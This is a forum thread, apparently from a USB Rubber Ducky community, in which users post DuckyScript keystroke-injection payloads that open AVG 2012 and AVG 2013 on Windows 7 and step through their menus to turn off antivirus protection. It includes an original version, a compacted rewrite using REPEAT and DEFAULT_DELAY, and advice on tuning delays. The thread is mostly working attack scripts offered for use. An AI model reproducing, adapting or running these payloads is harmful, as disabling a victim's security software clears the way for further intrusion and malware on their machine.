[payload] Disable AV protection for AVG versions 2012 and 2013 (tested under Windows 7)

[redmeatuk]

Hello all,

I've created payloads to temporarily disable AVG protection for versions 2012 and 2013, tested on Windows 7. You may need to change DELAY in the following script to play nice on other machines. These timings worked for me. I didn't have much joy with the REPEAT statement, hence lots of tabs etc.

Does anyone have ducky scripts for other AV ?

Disable AVG 2013 -:

REM This payload temporarily disables AVG 2013 for 15 minutes assumes that UAC has not been used recently
DELAY 3000
GUI r
DELAY 1000
STRING C:\Program Files (x86)\AVG\AVG2013\avgui
DELAY 400
ENTER
DELAY 1000
TAB
DELAY 400
TAB
DELAY 400
TAB
DELAY 400
TAB
DELAY 1000
TAB
DELAY 400
TAB
DELAY 400
TAB
DELAY 400
TAB
DELAY 400
TAB
DELAY 400
TAB
DELAY 400
TAB
DELAY 400
TAB
DELAY 400
TAB
DELAY 400
TAB
DELAY 400
TAB
DELAY 400
TAB
DELAY 400
TAB
DELAY 400
ENTER
DELAY 400
DOWN
DELAY 400
DOWN
DELAY 400
DOWN
DELAY 400
DOWN
DELAY 400
DOWN
DELAY 400
DOWN
DELAY 400
DOWN
DELAY 400
DOWN
DELAY 400
ENTER
DELAY 400
TAB
DELAY 400
TAB
DELAY 400
TAB
DELAY 400
TAB
DELAY 400
TAB
DELAY 400
TAB
DELAY 400
TAB
DELAY 400
TAB
DELAY 400
TAB
DELAY 400
TAB
DELAY 400
TAB
DELAY 400
TAB
DELAY 400
DOWN
DELAY 400
DOWN
DELAY 400
TAB
DELAY 400
TAB
DELAY 400
TAB
DELAY 400
TAB
DELAY 400
ENTER
DELAY 400
TAB
DELAY 400
DOWN
DELAY 400
DOWN
DELAY 400
ENTER
DELAY 400
TAB
DELAY 400
ENTER
DELAY 400
ALT y
DELAY 400
TAB
DELAY 400
TAB
DELAY 400
TAB
DELAY 400
ENTER	
DELAY 400
ALT F4

Disable AVG 2012

REM this payload disables AVG 2012 until next restart assumes that UAC has not been used recently
DELAY 3000
GUI r
DELAY 400
STRING C:\Program Files (x86)\AVG\AVG2012\avgui
DELAY 400
ENTER
DELAY 1000
ALT t
DELAY 400
DOWN
DELAY 400
DOWN
DELAY 400
DOWN
DELAY 400
DOWN
DELAY 400
DOWN
DELAY 400
ENTER
DELAY 400
DOWN
DELAY 400
DOWN
DELAY 400
TAB
DELAY 400
TAB
DELAY 400
TAB
DELAY 400
TAB
DELAY 400
SPACE
DELAY 400
TAB
DELAY 400
TAB
DELAY 400
TAB
DELAY 400
ENTER
DELAY 400
TAB
DELAY 400
DOWN
DELAY 400
DOWN
DELAY 400
ENTER
DELAY 400
ALT y
DELAY 400
ALT-F4

--

Cheers

Aaron

Edited May 13, 2013 by redmeatuk

[overwraith]

I added a few things to the duckscript to make it a little more compact. Haven't tested it yet, but it should work.

DEFAULT_DELAY 400
REM This payload temporarily disables AVG 2013 for 15 minutes assumes that UAC has not been used recently
REM Encoder 2.4
DELAY 3000
GUI r
DELAY 1000
STRING C:\Program Files (x86)\AVG\AVG2013\avgui
ENTER
DELAY 1000
TAB
REPEAT 3
DELAY 1000
TAB
REPEAT 12
ENTER
DOWN
REPEAT 7
ENTER
TAB
REPEAT 11
DOWN
DOWN
TAB
REPEAT 3
ENTER
TAB
DOWN
DOWN
ENTER
TAB
ENTER
ALT y
TAB
REPEAT 2
ENTER
ALT F4

DEFAULT_DELAY 400
REM this payload disables AVG 2012 until next restart assumes that UAC has not been used recently
REM Encoder 2.4
DELAY 3000
GUI r
STRING C:\Program Files (x86)\AVG\AVG2012\avgui
ENTER
DELAY 1000
ALT t
DOWN
REPEAT 4
ENTER
DOWN
DOWN
TAB
REPEAT 3
SPACE
TAB
REPEAT 2
ENTER
TAB
DOWN
DOWN
ENTER
ALT y
ALT-F4

[FoShizz]

Can you guys explain why have the long delay times?

[overwraith]

Some computers have slower processing times like laptops. If the script was developed on a laptop, the delays have to be long in order for the computer to recognize them as keystrokes. Otherwise, there will be missed keystrokes. Also, GUI's typically require a lot of time to start up, and sometimes to process. The delays can be changed, and using a DEFAULT_DELAY command makes it easier to change the delay time for the entire script. Many people also put a delay at the beginning of the script because there have been problems with the ducky starting typing before the computer is ready to receive input. I have been using the c_duck_v2_S002.hex for a while, so the payload loads when the trigger on the duck is pressed. If you're going that route, the delay at the beginning isn't even really necessary. I was not looking to change the script that much, mostly looking to add the default delay for quick swapping of the delay times.